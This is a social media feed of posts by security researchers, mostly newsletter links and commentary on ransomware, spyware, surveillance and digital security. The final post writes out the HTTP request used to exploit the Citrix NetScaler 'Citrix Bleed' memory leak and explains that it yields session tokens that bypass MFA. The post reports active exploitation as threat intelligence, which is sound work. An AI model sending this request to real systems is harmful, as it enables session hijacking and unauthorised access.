martijn_grooten

martijn_grooten, 14 days ago to random

I (finally) published a new edition of my Travels in Digital Security newsletter. With a main story on ransomware. Also: Ross Anderson, the Access Now Helpline, Bread and Net, website security, Apple threat notifications and more https://travels-in-digital-security.ghost.io/12-may-202/

aiefel, 14 days ago to random

deleted_by_author

jsrailton, 19 days ago to egypt

All shipping traffic stopped on the #Bosphorus Strait.

Channel connects Black Sea & Mediterranean is busiest in the world.

Why? Bulk carrier #Alexis is grounded across northbound shipping lane.

Headed to #Egypt from #Ukraine.

Turkish maritime authorities say on Twitter that they suspect mechanical failure.

#turkey #shipping #maritime #istanbul #blacksea

image/png
image/png
image/png

aiefel, 2 months ago to random

deleted_by_author

martijn_grooten, 3 months ago to random

Me: why does it feel like I am terribly behind on everything?
Also me: moved countries, again.

martijn_grooten, 3 months ago to random

I just sent out the latest edition of my Travels in Digital security newsletter, in which I look at using Signal at work. Also: Pegasus in Jordan, Tor code audit and the Virus Bulletin call for papers, and more https://travels-in-digital-security.ghost.io/7-february-2024-signals-at-work/

aiefel, 3 months ago to random

deleted_by_author

martijn_grooten, 3 months ago to random

I just sent out a new Travels in Digital Security newsletter, in which I looked into malicious .lnk files https://travels-in-digital-security.ghost.io/newsletter-4-30-january-2024/

kennwhite, 3 months ago to random

How about hell no?

martijn_grooten, 4 months ago to random

I just sent out a new edition of my digital security newsletter, in which I look at a recently reported issue (or 'issue') in WhatsApp https://travels-in-digital-security.ghost.io/newsletter-3-january-24th-2024/

martijn_grooten, 4 months ago to random

It looks like we need to redefine what we mean by a "wrench attack" https://arstechnica.com/security/2024/01/network-connected-wrenches-used-in-factories-can-be-hacked-for-sabotage-or-ransomware/

martijn_grooten, 4 months ago to random

In which I was called an "anti-virus veteran" and had a great chat discussing infosec history in a podcast with @thegrugq and @tomatospy https://risky.biz/BTN62/

lzg, 4 months ago to random

deleted_by_author

martijn_grooten, 5 months ago to random

Iran's Lifestyle Assessment System, passed into law last month, is every bit as scary as it sounds https://filter.watch/en/2023/12/14/irans-peoples-lifestyle-assessment-system-a-new-surveillance-threat/

martijn_grooten, 5 months ago to random

Random thing I learned recently that I don’t think enough people know: on modern Windows, ssh and scp are available on the command line. No more downloading PuTTy from https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html

martijn_grooten, 5 months ago to random

I finally got round to reading Elif Batuman's Either/Or. Her ability to awkwardly observe people is unique and makes me jealous. It's one of those books I wish I had read when I was around 20. It might have helped young, confused me https://www.penguin.co.uk/books/446143/eitheror-by-batuman-elif/9781529115932

martijn_grooten, 5 months ago to random

Today, we published this Field Guide to incident response for civil society and media, which I’ve been working on for the past year or so and which I am pretty excited about https://internews.org/resource/field-guide-to-incident-response-for-civil-society-and-media/

martijn_grooten, 5 months ago to random

Starting my week watching cyber philosopher @jags giving the keynote at @VirusBulletin this year and still kind of proud he chose this venue for this talk https://www.sentinelone.com/blog/the-physics-of-information-asymmetry-juan-andres-guerrero-saades-keynote-at-vb2023/

martijn_grooten, 6 months ago to random

I recently asked a digital rights activist if their government uses spyware like Pegasus and their answer was no, they just checked people's social media and arrested those expressing dissent. This piece from Bangladesh is a good example of that

aiefel, 6 months ago to random

deleted_by_author

kennwhite, 6 months ago to random

Leopold says hey.

martijn_grooten, 6 months ago to random

TIL: there is a security company called Lasso Security. Four white guys and doing something with AI because what is new, but hey, believe.

martijn_grooten, 6 months ago to random

I've been writing about different kinds of malware too much and I just found myself spelling 'somewhere' as 'someware'.

martijn_grooten, 6 months ago to random

It's easy to say that of course, cheap Android tablets are going to have malware on them, but for many people these are the only ones they can afford. For their kids, for example. Good analysis of such an infected tablet, until recently available on Amazon, by @zoracon https://www.eff.org/deeplinks/2023/11/low-budget-should-not-mean-high-risk-kids-tablet-came-preloaded-sketchyware

GossiTheDog, 7 months ago to random

Interesting Citrix Netscaler bug being mass exploited in the wild for about a month.

This is the HTTP request:

GET /oauth/idp/.well-known/openid-configuration HTTP/1.1
Host: a <repeated 24812 times>
Connection: close

It replies with system memory, which includes session tokens that you can use it gain remote access, bypassing authentication including MFA.

I think this one may have more legs than people realise. #threatintel

https://www.assetnote.io/resources/research/citrix-bleed-leaking-session-tokens-with-cve-2023-4966